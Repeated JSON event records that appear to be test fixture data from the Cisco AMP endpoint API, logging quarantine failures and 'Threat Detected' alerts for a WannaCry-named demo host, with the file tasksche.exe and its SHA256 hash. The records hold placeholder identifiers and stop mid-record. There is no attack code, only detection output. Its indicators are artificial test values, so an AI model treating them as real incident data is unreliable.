-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":860000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":610000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
